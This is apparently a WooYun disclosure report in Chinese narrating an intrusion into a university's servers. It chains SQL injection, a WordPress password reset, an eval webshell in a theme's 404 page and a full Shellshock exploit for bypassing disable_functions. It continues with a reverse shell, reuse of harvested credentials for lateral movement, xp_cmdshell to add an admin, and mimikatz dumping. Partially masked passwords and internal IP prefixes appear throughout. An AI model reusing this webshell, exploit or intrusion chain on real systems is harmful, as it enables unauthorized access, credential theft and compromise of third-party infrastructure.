WooYun.org

利用此漏洞：

http://**.**.**.**/bugs/wooyun-2010-089573



利用过程：

上面的漏洞注入的数据库身份是root，可以访问到所有的数据库

遂翻了翻"ms"这个库，发现是

1.http://**.**.**/

这个站的数据库，网站程序是wordpress



admin的密码cmd5没解出来

在网上翻到个用重置密码的方式来进后台的方法，需要重置密码的user_activation_key

key在点了重置密码后以明文的形式存在了数据库里

构造链接链接重置管理员密码

http://**.**.**.**/wp-login.php?action=rp&key=[ms.wp_users.user_activation_key]&login=admin



用户名密码如下：

*****bistu1*****

进了后台后，还是以老土的编辑模板的形式尝试getshell

在自带的twentyeleven模板的404页面插入一句话

<?php @eval($_POST['tttt']);?>

成功用菜刀链接

http://**.**.**.**/wp-content/themes/twentyeleven/404.php tttt

不过好像服务器开启了安全模式，没法执行命令，而且貌似设置了open_basedir，只能在有限的范围内修改文件

试试看服务器的bash漏洞是否修复了？

在当前目录上传了444.php,内容如下（zone里找的exp）

<?php 


# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) 


# Google Dork: none 


# Date: 10/31/2014 


# Exploit Author: Ryan King (Starfall) 


# Vendor Homepage: http://**.**.**.** 


# Software Link: http://**.**.**.**/get/php-5.6.2.tar.bz2/from/a/mirror 


# Version: 5.* (tested on 5.6.2) 


# Tested on: Debian 7 and CentOS 5 and 6 


# CVE: CVE-2014-6271 





function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283 


   $tmp = tempnam(".","data"); 


   putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); 


   // In Safe Mode, the user may only alter environment variableswhose names 


   // begin with the prefixes supplied by this directive. 


   // By default, users will only be able to set environment variablesthat 


   // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty, 


   // PHP will let the user modify ANY environment variable! 


   mail("a@**.**.**.**","","","","-bv"); // -bv so we don't actuallysend any mail 


   $output = @file_get_contents($tmp); 


   @unlink($tmp); 


   if($output != "") return $output; 


   else return "No output, or not vuln."; 


} 


echo shellshock($_REQUEST["cmd"]); 


?>

成功执行命令

http://**.**.**.**/wp-content/themes/twentyeleven/444.php?cmd=id

因为服务器可以对外发起链接，所以直接向我的VPS反弹了个shell

linux内核版本：2.6.18-308.el5

服务器版本：CentOS release 5.8 (Final)

未找到提权exp



先翻翻服务器里还有什么东西

网站文件都在 /home/www下

ls /home/www


**.**.**.**


default


dwgk.**.**.**.**


en.**.**.**.**


m.**.**.**.**


**.**.**.**


news2.**.**.**.**


newsfeed.**.**.**.**


nmc1.**.**.**.**


resource.**.**.**.**


rt.**.**.**.**


tmp


www2.**.**.**.**

在m.**.**.**.**翻到了mysql的root密码

root:zeng***1016

然后，看见个没见过的应用？

http://rt.**.**.**.**/

RackTables，查了下资料，是个机房的资产管理应用





数据库里存储的密码cmd5还是解不开－_－b

碰碰运气吧，尝试用这个数据库的连接密码

admin:bistu&&!$rt

然后就进去了－_－^

在空气里好像闻到了一丝中奖的味道？



管理员偷懒，把好多密码都写在这上面了

http://rt.**.**.**.**/index.php?page=ipv4net&id=1

虽然有部分密码已经变更了，但是依旧有部分可以登录

这么重要的站点的服务器上的应用出现了这么严重的漏洞，竟然被忽略了

简直闷声作大死





已知的未修改密码的主机：

Linux：

*****oot:bis*****

以下部分主机未对公网开放22端口，可以以222.249.130.*为跳板ssh连接

*****root:*******

*****3jwcdb(教务*****

*****root:bi*****

*****istu123aut*****

*****ot:Bistu*****

*****root:Bi*****

*****oot:bis*****

*****:bistu123*****

**********

*****ws:*****

*****:bis**100  �*****

然后连接到了222.249.130.*，查看是否有可以收集的信息（有可能管理员把所有密码记录到一个文本文件里？）

很可惜，没有找到，不过在

D:\WCMData\G\TRS\TRSWCMV65\Tomcat\webapps\wcm\WEB-INF\classes\trsconfig\domain\config.xml翻到了13年2月备份在这台主机上的官网数据库的连接配置文件

<DBConnections default="SQLServer">


			<DBConnect name="SQLServer" className="com.trs.infra.util.database.SQLServerDB" 


				dowithClob="false" 


				connectionURL="jdbc:jtds:sqlserver**.**.**.**:1433/TRSWCMV65" 


				connectionUser="sa" connectionPassword="EncrypteddHJzYWRtaW4hMjM." 


				initConnects="5" maxConnects="20" waitIfBusy="true" cacheScheme="DYNAMIC_GROW" traceAssign="true" timeToLiveOverUse="2000"/>

EncrypteddHJzYWRtaW4hMjM. -> dHJzYWRtaW4hMjM.把后面的这串字符debase64一下就行

得到密码为trsadmin!23



13年的密码，现在是不是改了呢？

于是抄起数据库管理工具navicat连接

然后不小心成功了2333

翻阅WCMUSER表

根据乌云之前的案例得知，WCM的用户表是对密码进行32位MD5加密然后取前15位

好像CMD5又帮不了我了

不过发现了大量相同的密码字段：621EE7AEAFA2281

我就猜测可能是统一的重置密码

在WCMCONFIG表内找到了：trsadmin

利用高权限的账户trs_zmm

成功登录系统

*****cm/app/*****

*****:trs*****

再深入一点:

因为连接222.249.130.***数据库的账户是sa，可以通过xp_cmdshell执行系统命令

增加一个管理员

*****fbd41284a8*****

使用神器mimikatz.exe抓取到了Administrator的密码：bistu&trs410



遂脑洞大开，在RackTables看到的官网主机的**.**.**.**密码是bistu!@#710，但连接不上

把!@#换成&，使用密码bistu&trs710，可以成功登录



到此为止，不再深入

用收集到的信息做字典肯定还能破解出更多的主机密码~